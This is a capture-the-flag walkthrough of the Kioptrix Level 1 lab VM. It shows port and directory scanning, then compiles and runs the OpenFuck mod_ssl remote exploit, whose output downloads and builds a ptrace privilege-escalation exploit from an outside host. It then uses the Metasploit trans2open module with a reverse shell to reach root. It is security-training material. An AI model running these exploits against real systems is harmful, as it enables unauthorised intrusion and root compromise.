Target information

This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.
Download
https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

Information gathering

First, use arp-scan to find the target's IP address.

┌──(root💀kali)-[~/Desktop]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:5d:2e:77, IPv4: 192.168.1.106
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.1.102   00:0c:29:55:cb:15       VMware, Inc.

9 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 2.135 seconds (119.91 hosts/sec). 7 responded

The target's IP address is 192.168.1.102; next, run a full port scan with nmap.

┌──(root💀kali)-[~/Desktop]
└─# nmap -sS -A -sC -sV -p- --min-rate 5000 192.168.1.102
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-12 07:47 EST
Nmap scan report for 192.168.1.102
Host is up (0.00042s latency).
Not shown: 65529 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1           1024/tcp   status
|_  100024  1           1024/udp   status
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after:  2010-09-26T09:32:06
|_ssl-date: 2021-11-12T13:50:26+00:00; +1h01m55s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|_    SSL2_DES_64_CBC_WITH_MD5
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:55:CB:15 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_clock-skew: 1h01m54s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE
HOP RTT     ADDRESS
1   0.42 ms 192.168.1.102

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.83 seconds

That is quite a lot of output; let's go through it one service at a time.

Port 80 doesn't seem to have much to look at, so let's run a directory scan.

┌──(root💀kali)-[~/Desktop]
└─# gobuster dir -w /usr/share/dirb/wordlists/common.txt -x .php -e -t 200 -u http://192.168.1.102/
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.102/
[+] Method:                  GET
[+] Threads:                 200
[+] Wordlist:                /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
2021/11/12 07:52:42 Starting gobuster in directory enumeration mode
===============================================================
http://192.168.1.102/.htaccess            (Status: 403) [Size: 273]
http://192.168.1.102/.htpasswd            (Status: 403) [Size: 273]
http://192.168.1.102/.hta                 (Status: 403) [Size: 268]
http://192.168.1.102/.htaccess.php        (Status: 403) [Size: 277]
http://192.168.1.102/.htpasswd.php        (Status: 403) [Size: 277]
http://192.168.1.102/.hta.php             (Status: 403) [Size: 272]
http://192.168.1.102/~root                (Status: 403) [Size: 269]
http://192.168.1.102/~operator            (Status: 403) [Size: 273]
http://192.168.1.102/cgi-bin/             (Status: 403) [Size: 272]
http://192.168.1.102/index.html           (Status: 200) [Size: 2890]
http://192.168.1.102/manual               (Status: 301) [Size: 294] [--> http://127.0.0.1/manual/]
http://192.168.1.102/mrtg                 (Status: 301) [Size: 292] [--> http://127.0.0.1/mrtg/]
http://192.168.1.102/usage                (Status: 301) [Size: 293] [--> http://127.0.0.1/usage/]
http://192.168.1.102/test.php             (Status: 200) [Size: 27]

Check each result in turn.

Several of the pages redirect to 127.0.0.1; only test.php is reachable, and it contains nothing of interest.

Back to the remaining ports.

┌──(root💀kali)-[~/Desktop]
└─# smbclient -L 192.168.1.102                                                                                                            1 ⨯
protocol negotiation failed: NT_STATUS_IO_TIMEOUT

Exploitation

The port 80 banner shows mod_ssl/2.8.4, so search for a matching exploit.

┌──(root💀kali)-[~/Desktop]
└─# searchsploit mod_ssl
------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                              |  Path
------------------------------------------------------------------------------------------------------------ ---------------------------------
Apache mod_ssl 2.0.x - Remote Denial of Service                                                             | linux/dos/24590.txt
Apache mod_ssl 2.8.x - Off-by-One HTAccess Buffer Overflow                                                  | multiple/dos/21575.txt
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow                                        | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1)                                  | unix/remote/764.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)                                  | unix/remote/47080.c
Apache mod_ssl OpenSSL < 0.9.6d / < 0.9.7-beta2 - 'openssl-too-open.c' SSL2 KEY_ARG Overflow                | unix/remote/40347.txt
------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

Compared against mod_ssl 2.8.4, three of the entries match the version; test each in turn.
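The version comparison above can be automated for a vulnerability-assessment report. This is an added example, not code from the original post: it parses the Apache Server header that nmap reported (embedded here as a constructed sample) and checks each component against the "less than" bounds given in the searchsploit titles, including letter-suffixed OpenSSL versions such as 0.9.6b. The CHECKS table is an assumption built from the searchsploit output on this page; note that it also flags the openssl-too-open entry, since 0.9.6b is below 0.9.6d.

```python
import re

# Constructed sample: the Server header nmap reported for port 80 above.
BANNER = "Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b"

# Assumed advisory table derived from the searchsploit titles on this page:
# (component, exclusive upper bound, title).
CHECKS = [
    ("mod_ssl", "2.8.7", "Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' (unix/remote/21671.c)"),
    ("mod_ssl", "2.8.7", "Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' (1) (unix/remote/764.c)"),
    ("mod_ssl", "2.8.7", "Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' (2) (unix/remote/47080.c)"),
    ("OpenSSL", "0.9.6d", "OpenSSL < 0.9.6d 'openssl-too-open.c' SSL2 KEY_ARG (unix/remote/40347.txt)"),
]


def parse_banner(banner):
    """Return {component: version} for every 'name/version' token in the banner.
    Tokens whose 'version' does not start with a digit (e.g. Red-Hat/Linux) are skipped."""
    return dict(re.findall(r"([A-Za-z_]+)/(\d[\w.]*)", banner))


def version_key(version):
    """Sort key for dotted versions with an optional letter suffix (0.9.6b < 0.9.6d)."""
    m = re.fullmatch(r"((?:\d+\.)*\d+)([a-z]*)", version)
    if m is None:
        raise ValueError(f"unrecognised version string: {version!r}")
    numbers = tuple(int(part) for part in m.group(1).split("."))
    return (numbers, m.group(2))


def affected(banner, checks=CHECKS):
    """Return the titles of every check whose bound the banner's component falls below."""
    versions = parse_banner(banner)
    hits = []
    for component, below, title in checks:
        found = versions.get(component)
        if found is not None and version_key(found) < version_key(below):
            hits.append(title)
    return hits


if __name__ == "__main__":
    print("components:", parse_banner(BANNER))
    for title in affected(BANNER):
        print("AFFECTED:", title)
```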

Testing shows that unix/remote/47080.c works, so copy it out of the exploitdb tree.

┌──(root💀kali)-[~/Desktop]
└─# locate unix/remote/47080.c
/usr/share/exploitdb/exploits/unix/remote/47080.c

┌──(root💀kali)-[~/Desktop]
└─# cp /usr/share/exploitdb/exploits/unix/remote/47080.c ./

Then compile it with gcc.

┌──(root💀kali)-[~/Desktop]
└─# gcc -o exploit 47080.c -lcrypto
47080.c:21:10: fatal error: openssl/ssl.h: 没有那个文件或目录
   21 | #include <openssl/ssl.h>
      |          ^~~~~~~~~~~~~~~
compilation terminated.

It fails with an error; a Baidu search shows that a package is missing.

Install it with apt.

┌──(root💀kali)-[~/Desktop]
└─# apt-get install libssl1.0-dev

Then compile again.

┌──(root💀kali)-[~/Desktop]
└─# gcc -o exploit 47080.c -lcrypto

┌──(root💀kali)-[~/Desktop]
└─# ls
47080.c  exploit

Run it.

┌──(root💀kali)-[~/Desktop]
└─# ./exploit

*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

: Usage: ./exploit target box [port] [-c N]

  target - supported box eg: 0x00
  box - hostname or IP address
  port - port for ssl connection
  -c open N connections. (use range 40-50 if u dont know)

Running it prints the usage; we still need to find the target identifier that matches our version.

┌──(root💀kali)-[~/Desktop]
└─# ./exploit | grep apache-1.3.20                                                                                                        1 ⨯
        0x02 - Cobalt Sun 6.0 (apache-1.3.20)
        0x27 - FreeBSD (apache-1.3.20)
        0x28 - FreeBSD (apache-1.3.20)
        0x29 - FreeBSD (apache-1.3.20+2.8.4)
        0x2a - FreeBSD (apache-1.3.20_1)
        0x3a - Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)
        0x3b - Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)
        0x3f - Mandrake Linux 8.1 (apache-1.3.20-3)
        0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
        0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
        0x7e - Slackware Linux 8.0 (apache-1.3.20)
        0x86 - SuSE Linux 7.3 (apache-1.3.20)

Two entries match, 0x6a and 0x6b; test each of them.

┌──(root💀kali)-[~/Desktop]
└─# ./exploit 0x6a 192.168.1.102 -c 40

*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Connection... 40 of 40
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f8070
Ready to send shellcode
Spawning shell...
Good Bye!

0x6a fails; now try 0x6b.

┌──(root💀kali)-[~/Desktop]
└─# ./exploit 0x6b 192.168.1.102 -c 40

*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Connection... 40 of 40
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f81e8
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
d.c; ./exploit; -kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmo
--09:32:52--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!

Unable to establish SSL connection.

Unable to establish SSL connection.
gcc: ptrace-kmod.c: No such file or directory
gcc: No input files
rm: cannot remove `ptrace-kmod.c': No such file or directory
bash: ./exploit: No such file or directory
bash-2.05$
bash-2.05$ whoami&&id
whoami&&id
apache
uid=48(apache) gid=48(apache) groups=48(apache)

0x6b gives us a shell; now on to privilege escalation.

Privilege escalation

Testing turned up no local privilege escalation path, but there is another route to root: a Metasploit module.

use exploit/linux/samba/trans2open
set payload linux/x86/shell_reverse_tcp
show options
set rhosts 192.168.1.102
exploit

msf6 exploit(linux/samba/trans2open) > exploit

[*] Started reverse TCP handler on 192.168.1.106:4444
[*] 192.168.1.102:139 - Trying return address 0xbffffdfc...
[*] 192.168.1.102:139 - Trying return address 0xbffffcfc...
[*] 192.168.1.102:139 - Trying return address 0xbffffbfc...
[*] 192.168.1.102:139 - Trying return address 0xbffffafc...
[*] 192.168.1.102:139 - Trying return address 0xbffff9fc...
[*] 192.168.1.102:139 - Trying return address 0xbffff8fc...
[*] Command shell session 1 opened (192.168.1.106:4444 -> 192.168.1.102:1036) at 2021-11-13 07:04:24 -0500

[*] Command shell session 2 opened (192.168.1.106:4444 -> 192.168.1.102:1037) at 2021-11-13 07:04:25 -0500
[*] Command shell session 3 opened (192.168.1.106:4444 -> 192.168.1.102:1038) at 2021-11-13 07:04:26 -0500
whoami&&id
root
uid=0(root) gid=0(root) groups=99(nobody)

Using the msf module lands you directly as root; as for why, I haven't figured it out (mainly because I'm a noob).

If anyone knows the reason, please let me know.